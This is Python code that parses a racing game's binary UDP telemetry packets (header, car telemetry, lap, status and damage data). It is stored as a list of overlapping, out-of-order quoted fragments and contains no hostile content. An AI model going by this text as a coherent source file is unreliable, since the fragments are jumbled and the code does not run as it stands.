binary_message (str):", "def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_damage", "= ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresDamage\"], \"m_tyresDamage\", ) ) player_car_damage_message.pop(\"m_tyresDamage\") # Map brake", "unpacked (list): Unpacked struct containing all attributes to construct CarTelemetryData class. \"\"\" return", "= [\"rl\", \"rr\", \"fl\", \"fr\"] telemetry_values_dict = {} for i, telemetry_value in enumerate(telemetry_values):", "position on car (fl, fr, rl, rr). Args: telemetry_values(list): List of telemetry values", "| _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresDamage\"], \"m_tyresDamage\", ) ) player_car_damage_message.pop(\"m_tyresDamage\") # Map brake damage values from", "ctypes.c_float m_ersDeployMode: ctypes.c_uint8 m_ersHarvestedThisLapMGUK: ctypes.c_float m_ersHarvestedThisLapMGUH: ctypes.c_float m_ersDeployedThisLap: ctypes.c_float @classmethod def from_unpacked(cls, unpacked:", "@dataclass class PacketCarTelemetryData: \"\"\"PacketCarTelemetryData struct.\"\"\" m_header: PacketHeader m_car_telemetry_data: List[CarTelemetryData] m_mfd_panel_index: ctypes.c_uint8 m_mfd_panel_index_secondary_player: ctypes.c_uint8", "\"LLHHfffBBBBBBBBBBBBBBHHB\" CAR_STATUS_DATA_FORMAT = \"BBBBBfffHHBBHBBBbfBfffB\" CAR_DAMAGE_DATA_FORMAT = \"ffffBBBBBBBBBBBBBBBBBBBBBBB\" def _telemetry_list_to_attributes(telemetry_values: list, attribute_name: str) ->", "tyre wear values from list to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes(", "from list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_brakes_temperature\"], \"m_brakes_temperature\", )", "telemetry_value return telemetry_values_dict @dataclass class PacketHeader: \"\"\"PacketHeader struct.\"\"\" 
m_packet_format: ctypes.c_uint16 m_game_major_version: ctypes.c_uint8 m_game_minor_version:", "m_fuelRemainingLaps: ctypes.c_float m_actualTyreCompound: ctypes.c_uint8 m_tyresAgeLaps: ctypes.c_uint8 m_ersStoreEnergy: ctypes.c_float m_ersDeployMode: ctypes.c_uint8 m_ersHarvestedThisLapMGUK: ctypes.c_float m_ersHarvestedThisLapMGUH:", "of struct. \"\"\" car_damage_data_list = cls.get_message_list( packet_header, binary_message, CAR_DAMAGE_DATA_FORMAT, CarDamageData ) return cls(packet_header,", "dict: \"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_damage = self.m_carDamageData[player_car_index] player_car_damage_message", "(i + 1) * len(CAR_TELEMETRY_DATA_FORMAT) ] ) car_telemetry_data_list.append(car_telemetry_data) return cls( packet_header, car_telemetry_data_list, unpacked_wo_header[-3],", "ctypes.c_uint8 m_ersHarvestedThisLapMGUK: ctypes.c_float m_ersHarvestedThisLapMGUH: ctypes.c_float m_ersDeployedThisLap: ctypes.c_float @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse", "from list to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresDamage\"], \"m_tyresDamage\", )", ") @dataclass class PacketLapData(PacketWOAdditionalAttributes): \"\"\"PacketCarTelemetryData struct.\"\"\" m_lap_data: List[LapData] @classmethod def from_binary(cls, packet_header: PacketHeader,", "single attributes from attributes list and allocate to position on car (fl, fr,", "struct.\"\"\" m_header: PacketHeader m_car_telemetry_data: List[CarTelemetryData] m_mfd_panel_index: ctypes.c_uint8 m_mfd_panel_index_secondary_player: ctypes.c_uint8 m_suggested_gear: ctypes.c_int8 @classmethod def", "return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9], list([unpacked[10],", "class attributes. 
Args: unpacked (list): Unpacked struct containing all attributes to construct CarTelemetryData", "\"BBb\" CAR_TELEMETRY_DATA_FORMAT = \"HfffBbHBBHHHHHBBBBBBBBHffffBBBB\" LAP_DATA_FORMAT = \"LLHHfffBBBBBBBBBBBBBBHHB\" CAR_STATUS_DATA_FORMAT = \"BBBBBfffHHBBHBBBbfBfffB\" CAR_DAMAGE_DATA_FORMAT = \"ffffBBBBBBBBBBBBBBBBBBBBBBB\"", "cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9], list([unpacked[10], unpacked[11],", "= unpacked[len(asdict(packet_header)) : :] # Get telemetry for each active car car_telemetry_data_list =", "unpacked[8], unpacked[9], list([unpacked[10], unpacked[11], unpacked[12], unpacked[13]]), list([unpacked[14], unpacked[15], unpacked[16], unpacked[17]]), list([unpacked[18], unpacked[19], unpacked[20],", "\"\"\"LapData struct.\"\"\" m_lastLapTimeInMS: ctypes.c_uint32 m_currentLapTimeInMS: ctypes.c_uint32 m_sector1TimeInMS: ctypes.c_uint16 m_sector2TimeInMS: ctypes.c_uint16 m_lapDistance: ctypes.c_uint32 m_currentLapNum:", ") return player_values @dataclass class CarStatusData: \"\"\"CarStatusData struct.\"\"\" m_fuelInTank: ctypes.c_float m_fuelCapacity: ctypes.c_float m_fuelRemainingLaps:", "construct CarTelemetryData class. \"\"\" return cls( unpacked[5], unpacked[6], unpacked[7], unpacked[13], unpacked[15], unpacked[17], unpacked[18],", "self.m_carDamageData[player_car_index] player_car_damage_message = ( self.m_header.__dict__ | player_car_damage.__dict__.copy() ) # Map tyre wear values", "attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresDamage\"], \"m_tyresDamage\", ) ) player_car_damage_message.pop(\"m_tyresDamage\") #", "car (fl, fr, rl, rr). Args: telemetry_values(list): List of telemetry values that should", "containing all attributes to construct CarTelemetryData class. 
\"\"\" return cls( unpacked[0], unpacked[1], unpacked[2],", "22) + PACKET_CAR_TELEMETRY_DATA_FORMAT, binary_message, ) # Remove header from struct unpacked_wo_header = unpacked[len(asdict(packet_header))", "return cls( unpacked[5], unpacked[6], unpacked[7], unpacked[13], unpacked[15], unpacked[17], unpacked[18], unpacked[19], unpacked[20], unpacked[21], )", "# Map tyre wear values from list to attributes player_car_damage_message = ( player_car_damage_message", "len(CAR_TELEMETRY_DATA_FORMAT) : (i + 1) * len(CAR_TELEMETRY_DATA_FORMAT) ] ) car_telemetry_data_list.append(car_telemetry_data) return cls( packet_header,", "from list to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresWear\"], \"m_tyresWear\", )", "struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(message_format * 22), binary_message, ) # Remove header from struct", "= \"BBb\" CAR_TELEMETRY_DATA_FORMAT = \"HfffBbHBBHHHHHBBBBBBBBHffffBBBB\" LAP_DATA_FORMAT = \"LLHHfffBBBBBBBBBBBBBBHHB\" CAR_STATUS_DATA_FORMAT = \"BBBBBfffHHBBHBBBbfBfffB\" CAR_DAMAGE_DATA_FORMAT =", "m_mfd_panel_index: ctypes.c_uint8 m_mfd_panel_index_secondary_player: ctypes.c_uint8 m_suggested_gear: ctypes.c_int8 @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str):", "Args: packet_header (PacketHeader): PacketHeader class. binary_message (str): Binary representation of struct. \"\"\" car_damage_data_list", "unpacked[9], ) @dataclass class PacketWOAdditionalAttributes: \"\"\"PacketCarStatusData struct.\"\"\" m_header: PacketHeader @classmethod def get_message_list( cls,", "\"\"\"PacketHeader struct.\"\"\" m_packet_format: ctypes.c_uint16 m_game_major_version: ctypes.c_uint8 m_game_minor_version: ctypes.c_uint8 m_packet_version: ctypes.c_uint8 m_packet_id: ctypes.c_uint8 m_session_uid:", "class form binary UDP package. Args: packet_header (PacketHeader): PacketHeader class. binary_message (str): Binary", "rr). 
Args: telemetry_values(list): List of telemetry values that should be mapped to attributes.", "attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresWear\"], \"m_tyresWear\", ) ) player_car_damage_message.pop(\"m_tyresWear\") #", "ctypes.c_float m_fuelRemainingLaps: ctypes.c_float m_actualTyreCompound: ctypes.c_uint8 m_tyresAgeLaps: ctypes.c_uint8 m_ersStoreEnergy: ctypes.c_float m_ersDeployMode: ctypes.c_uint8 m_ersHarvestedThisLapMGUK: ctypes.c_float", "unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9], list([unpacked[10], unpacked[11], unpacked[12], unpacked[13]]),", "@dataclass class CarStatusData: \"\"\"CarStatusData struct.\"\"\" m_fuelInTank: ctypes.c_float m_fuelCapacity: ctypes.c_float m_fuelRemainingLaps: ctypes.c_float m_actualTyreCompound: ctypes.c_uint8", ": :] # Get lap data for each active car data_list = list()", "= self.m_header.m_player_car_index player_values = ( self.m_header.__dict__ | self.m_carStatusData[player_car_index].__dict__.copy() ) return player_values @dataclass class", "] ) data_list.append(data) return data_list @dataclass class CarTelemetryData: \"\"\"CarTelemetryData struct.\"\"\" m_speed: ctypes.c_uint16 m_throttle:", "self.m_carStatusData[player_car_index].__dict__.copy() ) return player_values @dataclass class CarDamageData: \"\"\"CarStatusData struct.\"\"\" m_tyresWear: ctypes.c_float m_tyresDamage: ctypes.c_uint8", "unpacked[10], unpacked[11]]), ) @dataclass class PacketCarDamageData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carDamageData: List[CarDamageData] @classmethod def from_binary(cls,", "typing import List PACKET_HEADER_FORMAT = \"<HBBBBQfLBB\" PACKET_CAR_TELEMETRY_DATA_FORMAT = \"BBb\" CAR_TELEMETRY_DATA_FORMAT = \"HfffBbHBBHHHHHBBBBBBBBHffffBBBB\" LAP_DATA_FORMAT", "\"\"\" format_string = \"<HBBBBQfLBB\" unpacked = 
struct.unpack_from(format_string, binary_message) return cls( unpacked[0], unpacked[1], unpacked[2],", "car telemetry. Classes parse data from binary format and extract player data.\"\"\" import", ") ) player_telemetry_message.pop(\"m_brakes_temperature\") # Map tyres pressure values from list to attributes player_telemetry_message", "= cls.get_message_list( packet_header, binary_message, CAR_STATUS_DATA_FORMAT, CarStatusData ) return cls(packet_header, car_status_data_list) def get_player_car_data(self) ->", "classes for car telemetry. Classes parse data from binary format and extract player", "* 22), binary_message, ) # Remove header from struct unpacked_wo_header = unpacked[len(asdict(packet_header)) :", "= ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_pressure\"], \"m_tyres_pressure\", ) ) player_telemetry_message.pop(\"m_tyres_pressure\") player_telemetry_message.pop(\"m_surface_type\") return player_telemetry_message", "List[CarDamageData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class form binary UDP", "PacketHeader m_car_telemetry_data: List[CarTelemetryData] m_mfd_panel_index: ctypes.c_uint8 m_mfd_panel_index_secondary_player: ctypes.c_uint8 m_suggested_gear: ctypes.c_int8 @classmethod def from_binary(cls, packet_header:", "player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_values = ( self.m_header.__dict__ | self.m_carStatusData[player_car_index].__dict__.copy() ) return", "unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9], ) @dataclass class PacketWOAdditionalAttributes: \"\"\"PacketCarStatusData", "car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_telemetry = self.m_car_telemetry_data[player_car_index] player_telemetry_message = ( self.m_header.__dict__ | player_car_telemetry.__dict__.copy()", "attributes list and allocate to position on car (fl, 
fr, rl, rr). Args:", "ctypes.c_uint8 m_rev_lights_percent: ctypes.c_uint8 m_rev_lights_bit_value: ctypes.c_uint16 m_brakes_temperature: List[ctypes.c_uint16] m_tyres_surface_temperature: List[ctypes.c_uint8] m_tyres_inner_temperature: List[ctypes.c_uint8] m_engine_temperature: ctypes.c_uint16", "unpacked[22], list([unpacked[23], unpacked[24], unpacked[25], unpacked[26]]), list([unpacked[27], unpacked[28], unpacked[29], unpacked[30]]), ) @dataclass class PacketCarTelemetryData:", "ctypes.c_uint16 m_game_major_version: ctypes.c_uint8 m_game_minor_version: ctypes.c_uint8 m_packet_version: ctypes.c_uint8 m_packet_id: ctypes.c_uint8 m_session_uid: ctypes.c_uint64 m_session_time: ctypes.c_float", "unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9], ) @dataclass class PacketWOAdditionalAttributes: \"\"\"PacketCarStatusData struct.\"\"\"", "and extract player data.\"\"\" import struct import ctypes from dataclasses import dataclass, asdict", "Attribute name used as keys in dict. \"\"\" car_position_mapping = [\"rl\", \"rr\", \"fl\",", "ctypes.c_uint8 @classmethod def from_binary(cls, binary_message: str): \"\"\"Create class form binary UDP package. 
Args:", "\"\"\" return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9],", "struct.unpack_from(format_string, binary_message) return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8],", "m_brakesDamage: ctypes.c_uint8 @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into class attributes.", "unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9], list([unpacked[10], unpacked[11], unpacked[12],", "active car data_list = list() for i in range(22): data = message_type.from_unpacked( unpacked_wo_header[", "player_car_damage_message[\"m_tyresDamage\"], \"m_tyresDamage\", ) ) player_car_damage_message.pop(\"m_tyresDamage\") # Map brake damage values from list to", "m_game_major_version: ctypes.c_uint8 m_game_minor_version: ctypes.c_uint8 m_packet_version: ctypes.c_uint8 m_packet_id: ctypes.c_uint8 m_session_uid: ctypes.c_uint64 m_session_time: ctypes.c_float m_frame_identifier:", "Args: packet_header (PacketHeader): PacketHeader class. binary_message (str): Binary representation of struct. \"\"\" car_status_data_list", "player_values = ( self.m_header.__dict__ | self.m_carStatusData[player_car_index].__dict__.copy() ) return player_values @dataclass class CarDamageData: \"\"\"CarStatusData", "all attributes to construct CarTelemetryData class. 
\"\"\" return cls( unpacked[5], unpacked[6], unpacked[7], unpacked[13],", "dict: \"\"\"Get single attributes from attributes list and allocate to position on car", "CarStatusData ) return cls(packet_header, car_status_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from player", "List[ctypes.c_float] m_surface_type: List[ctypes.c_uint8] @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into class", "m_engine_temperature: ctypes.c_uint16 m_tyres_pressure: List[ctypes.c_float] m_surface_type: List[ctypes.c_uint8] @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked", "cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9], ) @dataclass", "# Get telemetry for each active car car_telemetry_data_list = list() for i in", "ctypes.c_uint32 m_currentLapTimeInMS: ctypes.c_uint32 m_sector1TimeInMS: ctypes.c_uint16 m_sector2TimeInMS: ctypes.c_uint16 m_lapDistance: ctypes.c_uint32 m_currentLapNum: ctypes.c_uint8 @classmethod def", "PacketLapData(PacketWOAdditionalAttributes): \"\"\"PacketCarTelemetryData struct.\"\"\" m_lap_data: List[LapData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create", "attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_brakes_temperature\"], \"m_brakes_temperature\", ) ) player_telemetry_message.pop(\"m_brakes_temperature\") #", "representation of package header. 
\"\"\" format_string = \"<HBBBBQfLBB\" unpacked = struct.unpack_from(format_string, binary_message) return", "for i in range(22): data = message_type.from_unpacked( unpacked_wo_header[ i * len(message_format) : (i", "m_packet_format: ctypes.c_uint16 m_game_major_version: ctypes.c_uint8 m_game_minor_version: ctypes.c_uint8 m_packet_version: ctypes.c_uint8 m_packet_id: ctypes.c_uint8 m_session_uid: ctypes.c_uint64 m_session_time:", "): \"\"\"Create class form binary UDP package. Args: packet_header (PacketHeader): PacketHeader class. binary_message", "binary_message) return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9],", "unpacked[9], list([unpacked[10], unpacked[11], unpacked[12], unpacked[13]]), list([unpacked[14], unpacked[15], unpacked[16], unpacked[17]]), list([unpacked[18], unpacked[19], unpacked[20], unpacked[21]]),", "class PacketHeader: \"\"\"PacketHeader struct.\"\"\" m_packet_format: ctypes.c_uint16 m_game_major_version: ctypes.c_uint8 m_game_minor_version: ctypes.c_uint8 m_packet_version: ctypes.c_uint8 m_packet_id:", "(PacketHeader): PacketHeader class. binary_message (str): Binary representation of struct. \"\"\" car_status_data_list = cls.get_message_list(", "parse data from binary format and extract player data.\"\"\" import struct import ctypes", "values that should be mapped to attributes. 
attribute_name(str): Attribute name used as keys", "telemetry_values_dict[key_name] = telemetry_value return telemetry_values_dict @dataclass class PacketHeader: \"\"\"PacketHeader struct.\"\"\" m_packet_format: ctypes.c_uint16 m_game_major_version:", "range(22): car_telemetry_data = CarTelemetryData.from_unpacked( unpacked_wo_header[ i * len(CAR_TELEMETRY_DATA_FORMAT) : (i + 1) *", "player_telemetry_message = ( self.m_header.__dict__ | player_car_telemetry.__dict__.copy() ) # Map tyre temperature values from", "player_car_index = self.m_header.m_player_car_index player_car_telemetry = self.m_car_telemetry_data[player_car_index] player_telemetry_message = ( self.m_header.__dict__ | player_car_telemetry.__dict__.copy() )", "data_list @dataclass class CarTelemetryData: \"\"\"CarTelemetryData struct.\"\"\" m_speed: ctypes.c_uint16 m_throttle: ctypes.c_float m_steer: ctypes.c_float m_brake:", "class. \"\"\" return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8],", "to construct CarTelemetryData class. 
\"\"\" return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[8]", "PacketWOAdditionalAttributes: \"\"\"PacketCarStatusData struct.\"\"\" m_header: PacketHeader @classmethod def get_message_list( cls, packet_header: PacketHeader, binary_message: str,", "from list to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_brakesDamage\"], \"m_brakesDamage\", )", "tyre inner temperature values from list to attributes player_telemetry_message = ( player_telemetry_message |", "m_header: PacketHeader @classmethod def get_message_list( cls, packet_header: PacketHeader, binary_message: str, message_format: str, message_type:", "\"m_tyres_surface_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_surface_temperature\") # Map tyre inner temperature values from list to", "LAP_DATA_FORMAT, LapData ) return cls(packet_header, lap_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from", "containing all attributes to construct CarTelemetryData class. \"\"\" return cls( unpacked[5], unpacked[6], unpacked[7],", "\"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_damage = self.m_carDamageData[player_car_index] player_car_damage_message =", "Args: unpacked (list): Unpacked struct containing all attributes to construct CarTelemetryData class. \"\"\"", "telemetry_values(list): List of telemetry values that should be mapped to attributes. 
attribute_name(str): Attribute", "Unpack struct unpacked = struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(message_format * 22), binary_message, ) #", "ctypes.c_uint32 m_sector1TimeInMS: ctypes.c_uint16 m_sector2TimeInMS: ctypes.c_uint16 m_lapDistance: ctypes.c_uint32 m_currentLapNum: ctypes.c_uint8 @classmethod def from_unpacked(cls, unpacked:", "m_gear: ctypes.c_int8 m_engine_rpm: ctypes.c_uint16 m_drs: ctypes.c_uint8 m_rev_lights_percent: ctypes.c_uint8 m_rev_lights_bit_value: ctypes.c_uint16 m_brakes_temperature: List[ctypes.c_uint16] m_tyres_surface_temperature:", "attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_pressure\"], \"m_tyres_pressure\", ) ) player_telemetry_message.pop(\"m_tyres_pressure\") player_telemetry_message.pop(\"m_surface_type\")", "player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_values = ( self.m_header.__dict__ | self.m_lap_data[player_car_index].__dict__.copy() ) return", "\"\".join(message_format * 22), binary_message, ) # Remove header from struct unpacked_wo_header = unpacked[len(asdict(packet_header))", "struct.\"\"\" m_speed: ctypes.c_uint16 m_throttle: ctypes.c_float m_steer: ctypes.c_float m_brake: ctypes.c_float m_clutch: ctypes.c_uint8 m_gear: ctypes.c_int8", "player_telemetry_message.pop(\"m_tyres_pressure\") player_telemetry_message.pop(\"m_surface_type\") return player_telemetry_message @dataclass class LapData: \"\"\"LapData struct.\"\"\" m_lastLapTimeInMS: ctypes.c_uint32 m_currentLapTimeInMS: ctypes.c_uint32", "in enumerate(telemetry_values): key_name = str(attribute_name) + \"_\" + car_position_mapping[i] telemetry_values_dict[key_name] = telemetry_value return", "Map brake damage values from list to attributes player_car_damage_message = ( player_car_damage_message |", "player_car_damage_message.pop(\"m_tyresWear\") # Map tyre damage values from list to attributes player_car_damage_message = (", "that 
should be mapped to attributes. attribute_name(str): Attribute name used as keys in", "unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[8] ) @dataclass class PacketLapData(PacketWOAdditionalAttributes): \"\"\"PacketCarTelemetryData struct.\"\"\" m_lap_data: List[LapData]", ":] # Get lap data for each active car data_list = list() for", "str): \"\"\"Create class form binary UDP package. Args: packet_header (PacketHeader): PacketHeader class. binary_message", ") player_telemetry_message.pop(\"m_tyres_surface_temperature\") # Map tyre inner temperature values from list to attributes player_telemetry_message", "player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_brakes_temperature\"], \"m_brakes_temperature\", ) ) player_telemetry_message.pop(\"m_brakes_temperature\") # Map tyres pressure values", "form binary UDP package. Args: packet_header (PacketHeader): PacketHeader class. binary_message (str): Binary representation", "unpacked[30]]), ) @dataclass class PacketCarTelemetryData: \"\"\"PacketCarTelemetryData struct.\"\"\" m_header: PacketHeader m_car_telemetry_data: List[CarTelemetryData] m_mfd_panel_index: ctypes.c_uint8", "= ( self.m_header.__dict__ | player_car_damage.__dict__.copy() ) # Map tyre wear values from list", "(list): Unpacked struct containing all attributes to construct CarTelemetryData class. 
\"\"\" return cls(", "data.\"\"\" import struct import ctypes from dataclasses import dataclass, asdict from typing import", "unpacked[18], unpacked[19], unpacked[20], unpacked[21], ) @dataclass class PacketCarStatusData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carStatusData: List[CarStatusData] @classmethod", "unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9], list([unpacked[10], unpacked[11], unpacked[12], unpacked[13]]), list([unpacked[14], unpacked[15], unpacked[16], unpacked[17]]),", "( self.m_header.__dict__ | self.m_carStatusData[player_car_index].__dict__.copy() ) return player_values @dataclass class CarDamageData: \"\"\"CarStatusData struct.\"\"\" m_tyresWear:", "unpacked[7], unpacked[8], unpacked[9], list([unpacked[10], unpacked[11], unpacked[12], unpacked[13]]), list([unpacked[14], unpacked[15], unpacked[16], unpacked[17]]), list([unpacked[18], unpacked[19],", "CAR_TELEMETRY_DATA_FORMAT = \"HfffBbHBBHHHHHBBBBBBBBHffffBBBB\" LAP_DATA_FORMAT = \"LLHHfffBBBBBBBBBBBBBBHHB\" CAR_STATUS_DATA_FORMAT = \"BBBBBfffHHBBHBBBbfBfffB\" CAR_DAMAGE_DATA_FORMAT = \"ffffBBBBBBBBBBBBBBBBBBBBBBB\" def", "to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresWear\"], \"m_tyresWear\", ) ) player_car_damage_message.pop(\"m_tyresWear\")", "struct.\"\"\" m_fuelInTank: ctypes.c_float m_fuelCapacity: ctypes.c_float m_fuelRemainingLaps: ctypes.c_float m_actualTyreCompound: ctypes.c_uint8 m_tyresAgeLaps: ctypes.c_uint8 m_ersStoreEnergy: ctypes.c_float", "damage values from list to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresDamage\"],", ") player_car_damage_message.pop(\"m_tyresWear\") # Map tyre damage values from list to attributes player_car_damage_message =", "values from list to attributes player_car_damage_message = ( player_car_damage_message | 
_telemetry_list_to_attributes( player_car_damage_message[\"m_tyresWear\"], \"m_tyresWear\",", "+ \"_\" + car_position_mapping[i] telemetry_values_dict[key_name] = telemetry_value return telemetry_values_dict @dataclass class PacketHeader: \"\"\"PacketHeader", "import ctypes from dataclasses import dataclass, asdict from typing import List PACKET_HEADER_FORMAT =", "representation of struct. \"\"\" # Unpack struct unpacked = struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(CAR_TELEMETRY_DATA_FORMAT", "binary_message, LAP_DATA_FORMAT, LapData ) return cls(packet_header, lap_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data", "m_tyresWear: ctypes.c_float m_tyresDamage: ctypes.c_uint8 m_brakesDamage: ctypes.c_uint8 @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked", "ctypes.c_uint8 m_ersStoreEnergy: ctypes.c_float m_ersDeployMode: ctypes.c_uint8 m_ersHarvestedThisLapMGUK: ctypes.c_float m_ersHarvestedThisLapMGUH: ctypes.c_float m_ersDeployedThisLap: ctypes.c_float @classmethod def", "extract player data.\"\"\" import struct import ctypes from dataclasses import dataclass, asdict from", "LAP_DATA_FORMAT = \"LLHHfffBBBBBBBBBBBBBBHHB\" CAR_STATUS_DATA_FORMAT = \"BBBBBfffHHBBHBBBbfBfffB\" CAR_DAMAGE_DATA_FORMAT = \"ffffBBBBBBBBBBBBBBBBBBBBBBB\" def _telemetry_list_to_attributes(telemetry_values: list, attribute_name:", "player_values @dataclass class CarDamageData: \"\"\"CarStatusData struct.\"\"\" m_tyresWear: ctypes.c_float m_tyresDamage: ctypes.c_uint8 m_brakesDamage: ctypes.c_uint8 @classmethod", "format and extract player data.\"\"\" import struct import ctypes from dataclasses import dataclass,", "def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_telemetry", "player_car_damage = self.m_carDamageData[player_car_index] player_car_damage_message = ( self.m_header.__dict__ | player_car_damage.__dict__.copy() ) # Map tyre", "binary_message: 
str, message_format: str, message_type: object, ): \"\"\"Create class form binary UDP package.", "@classmethod def get_message_list( cls, packet_header: PacketHeader, binary_message: str, message_format: str, message_type: object, ):", "wear values from list to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresWear\"],", "car data_list = list() for i in range(22): data = message_type.from_unpacked( unpacked_wo_header[ i", "to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_surface_temperature\"], \"m_tyres_surface_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_surface_temperature\")", ") return player_values @dataclass class CarDamageData: \"\"\"CarStatusData struct.\"\"\" m_tyresWear: ctypes.c_float m_tyresDamage: ctypes.c_uint8 m_brakesDamage:", "m_ersHarvestedThisLapMGUK: ctypes.c_float m_ersHarvestedThisLapMGUH: ctypes.c_float m_ersDeployedThisLap: ctypes.c_float @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked", "PacketCarStatusData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carStatusData: List[CarStatusData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create", "packet_header, binary_message, CAR_STATUS_DATA_FORMAT, CarStatusData ) return cls(packet_header, car_status_data_list) def get_player_car_data(self) -> dict: \"\"\"Get", "import dataclass, asdict from typing import List PACKET_HEADER_FORMAT = \"<HBBBBQfLBB\" PACKET_CAR_TELEMETRY_DATA_FORMAT = \"BBb\"", "form binary UDP package. Args: binary_message (str): Binary representation of package header. \"\"\"", "struct. 
\"\"\" car_status_data_list = cls.get_message_list( packet_header, binary_message, CAR_STATUS_DATA_FORMAT, CarStatusData ) return cls(packet_header, car_status_data_list)", "message_type.from_unpacked( unpacked_wo_header[ i * len(message_format) : (i + 1) * len(message_format) ] )", "@dataclass class PacketLapData(PacketWOAdditionalAttributes): \"\"\"PacketCarTelemetryData struct.\"\"\" m_lap_data: List[LapData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message:", "| _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_inner_temperature\"], \"m_tyres_inner_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_inner_temperature\") # Map brake temperature values from", "\"\"\" car_position_mapping = [\"rl\", \"rr\", \"fl\", \"fr\"] telemetry_values_dict = {} for i, telemetry_value", "UDP package. Args: binary_message (str): Binary representation of package header. \"\"\" format_string =", "Unpacked struct containing all attributes to construct CarTelemetryData class. 
